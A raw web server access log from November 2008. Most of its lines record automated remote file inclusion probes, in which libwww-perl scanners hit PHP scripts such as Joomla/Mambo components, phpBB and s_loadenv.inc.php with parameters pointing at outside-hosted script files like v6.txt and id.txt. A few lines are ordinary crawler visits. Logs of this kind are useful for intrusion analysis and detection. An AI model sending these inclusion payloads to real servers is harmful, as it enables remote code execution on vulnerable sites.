202.171.190.140 - - [02/Nov/2008:22:48:32 -0600] "GET ///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.parcornithologique.com/forum/conf/id2? HTTP/1.1" 404 347 "-""libwww-perl/5.808"
216.32.94.162 - - [02/Nov/2008:22:51:55 -0600] "GET /phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
216.32.94.162 - - [02/Nov/2008:22:51:55 -0600] "GET /logs/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
89.218.85.18 - - [02/Nov/2008:22:58:03 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.218.85.18 - - [02/Nov/2008:22:58:03 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
66.40.52.30 - - [02/Nov/2008:23:02:36 -0600] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:02:36 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:02:36 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:02:36 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
207.58.140.237 - - [02/Nov/2008:23:02:41 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:23:02:41 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
207.58.140.237 - - [02/Nov/2008:23:02:41 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
66.40.52.30 - - [02/Nov/2008:23:03:54 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:03:54 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:04:17 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:04:17 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
65.55.25.136 - - [02/Nov/2008:23:07:42 -0600] "GET /costume/thmb5.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.136 - - [02/Nov/2008:23:07:42 -0600] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.25.136 - - [02/Nov/2008:23:07:42 -0600] "GET /costume/thmb6.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
207.150.183.60 - - [02/Nov/2008:23:08:42 -0600] "GET /logs//zipndownload.php?PP_PATH=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
207.150.183.60 - - [02/Nov/2008:23:08:42 -0600] "GET //zipndownload.php?PP_PATH=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
65.55.208.122 - - [02/Nov/2008:23:09:16 -0600] "GET /logs/access_log.1184544000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
87.230.0.157 - - [02/Nov/2008:23:11:29 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
87.230.0.157 - - [02/Nov/2008:23:11:29 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.76"
87.230.0.157 - - [02/Nov/2008:23:11:30 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.76"
66.40.52.30 - - [02/Nov/2008:23:13:11 -0600] "GET /?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:13:11 -0600] "GET /logs/?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 105501 "-""libwww-perl/5.800"
79.170.90.64 - - [02/Nov/2008:23:19:04 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:06 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:08 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:08 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:39 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:39 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:39 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:19:42 -0600] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:19:54 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:19:54 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
88.84.145.169 - - [02/Nov/2008:23:24:59 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
88.84.145.169 - - [02/Nov/2008:23:25:00 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
207.150.183.60 - - [02/Nov/2008:23:27:03 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
207.150.183.60 - - [02/Nov/2008:23:27:04 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.l2reloaded.org/editor/robots.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
79.170.90.64 - - [02/Nov/2008:23:27:24 -0600] "GET /?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:27:25 -0600] "GET /logs/?sIncPath=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 105501 "-""libwww-perl/5.810"
87.230.0.157 - - [02/Nov/2008:23:27:57 -0600] "GET /logs/access_log.1205366400/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
87.230.0.157 - - [02/Nov/2008:23:27:57 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.76"
87.230.0.157 - - [02/Nov/2008:23:27:57 -0600] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mykr.net/bbs/id.txt? HTTP/1.1" 404 330 "-""libwww-perl/5.76"
79.170.90.64 - - [02/Nov/2008:23:28:02 -0600] "GET /?sIncPath=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
79.170.90.64 - - [02/Nov/2008:23:28:03 -0600] "GET /logs/?sIncPath=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 200 105501 "-""libwww-perl/5.810"
216.139.67.116 - - [02/Nov/2008:23:29:27 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.64"
216.139.67.116 - - [02/Nov/2008:23:29:27 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.64"
69.72.144.18 - - [02/Nov/2008:23:31:05 -0600] "GET //tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:31:05 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:31:05 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:31:05 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
66.40.52.30 - - [02/Nov/2008:23:34:47 -0600] "GET /?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.800"
66.40.52.30 - - [02/Nov/2008:23:34:47 -0600] "GET /logs/?sourcedir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 200 105501 "-""libwww-perl/5.800"
62.141.48.87 - - [02/Nov/2008:23:35:32 -0600] "GET /logs//saveserver.php?thisdir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
62.141.48.87 - - [02/Nov/2008:23:35:32 -0600] "GET /logs/access_log.1216425600//saveserver.php?thisdir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 326 "-""libwww-perl/5.810"
62.141.48.87 - - [02/Nov/2008:23:35:32 -0600] "GET //saveserver.php?thisdir=http://www.bodez.us/template/cmd? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:39:20 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:39:20 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:43:10 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
69.72.144.18 - - [02/Nov/2008:23:43:10 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://geocities.com/ronikoe/z6id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
74.6.18.228 - - [02/Nov/2008:23:47:29 -0600] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.228 - - [02/Nov/2008:23:47:29 -0600] "GET /?M=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.246.55.229 - - [02/Nov/2008:23:47:50 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:23:47:51 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:23:48:32 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
216.246.55.229 - - [02/Nov/2008:23:48:32 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
67.18.151.242 - - [02/Nov/2008:23:53:31 -0600] "GET ///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://webesek.hu//bot.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
67.18.151.242 - - [02/Nov/2008:23:53:32 -0600] "GET /logs///mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://webesek.hu//bot.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
65.55.208.132 - - [03/Nov/2008:00:05:08 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [03/Nov/2008:00:05:08 -0600] "GET /logs/access_log.1212537600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
216.55.140.43 - - [03/Nov/2008:00:16:30 -0600] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:00:16:31 -0600] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:00:16:32 -0600] "GET /logs//components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:00:16:32 -0600] "GET //components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:00:16:33 -0600] "GET /logs//components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.69"
216.55.140.43 - - [03/Nov/2008:00:16:33 -0600] "GET //components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.69"
67.205.7.217 - - [03/Nov/2008:00:17:37 -0600] "GET //components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:37 -0600] "GET //components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:37 -0600] "GET //components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:37 -0600] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:39 -0600] "GET /logs//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:39 -0600] "GET //components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:43 -0600] "GET /logs//components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
67.205.7.217 - - [03/Nov/2008:00:17:43 -0600] "GET //components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://www.mymudpie.com/dlk/sistem.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:00:20:31 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:20:31 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:20:37 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:20:37 -0600] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:20:41 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:20:41 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:21:22 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:21:22 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.800"
83.149.69.97 - - [03/Nov/2008:00:24:31 -0600] "GET /logs/?sourcedir=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 200 105501 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:24:31 -0600] "GET /?sourcedir=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
66.147.239.184 - - [03/Nov/2008:00:28:54 -0600] "GET /logs/access_log.1208217600/auth.php?inc_dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
66.147.239.184 - - [03/Nov/2008:00:28:54 -0600] "GET /auth.php?inc_dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.810"
66.147.239.184 - - [03/Nov/2008:00:28:54 -0600] "GET /logs/auth.php?inc_dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:00:29:01 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:00:29:01 -0600] "GET /errors.php?error=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
200.140.135.93 - - [03/Nov/2008:00:29:10 -0600] "GET /logs//rgboard/?site_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
200.140.135.93 - - [03/Nov/2008:00:29:10 -0600] "GET //rgboard/?site_path=http://200.113.126.76/ids.txt?%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.65"
83.149.69.97 - - [03/Nov/2008:00:30:12 -0600] "GET //content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:30:13 -0600] "GET /logs//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:30:13 -0600] "GET /logs/access_log.1214438400//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:30:16 -0600] "GET /logs/access_log.1215302400//content/view/64/157/index.php?option=com_content&Itemid=&mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
66.147.239.184 - - [03/Nov/2008:00:31:32 -0600] "GET /logs/access_log.1206576000/auth.php?inc_dir=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.810"
193.53.23.32 - - [03/Nov/2008:00:31:35 -0600] "GET /logs//xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:00:31:35 -0600] "GET //xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:00:31:38 -0600] "GET /logs//xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.803"
193.53.23.32 - - [03/Nov/2008:00:31:38 -0600] "GET //xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://spd-esens.de/spd/downloads/confid.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.803"
66.40.52.30 - - [03/Nov/2008:00:31:59 -0600] "GET //s_e404.php?DOCUMENT_ROOT=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:00:31:59 -0600] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.800"
83.149.69.97 - - [03/Nov/2008:00:33:36 -0600] "GET /logs/access_log.1206576000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:33:36 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:33:37 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:34:02 -0600] "GET /logs/access_log.1206230400//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
79.170.90.64 - - [03/Nov/2008:00:34:07 -0600] "GET /errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:00:34:08 -0600] "GET /logs/errors.php?error=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
83.149.69.97 - - [03/Nov/2008:00:34:19 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:34:19 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.phdcursos.com.br/http/idd.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
79.170.90.64 - - [03/Nov/2008:00:34:35 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:00:34:37 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
88.86.110.83 - - [03/Nov/2008:00:34:38 -0600] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
88.86.110.83 - - [03/Nov/2008:00:34:38 -0600] "GET //s_e404.php?DOCUMENT_ROOT=http://www.gardhenal.com/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
79.170.90.64 - - [03/Nov/2008:00:35:00 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
79.170.90.64 - - [03/Nov/2008:00:35:00 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
83.149.69.97 - - [03/Nov/2008:00:36:57 -0600] "GET /logs/access_log.1206576000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:36:57 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:36:57 -0600] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:37:14 -0600] "GET /logs/access_log.1206576000//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.149.69.97 - - [03/Nov/2008:00:37:15 -0600] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://networksw.com/carpool/technote7//skin_shop/standard/3_plugin_twindow/idxx.txt????? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
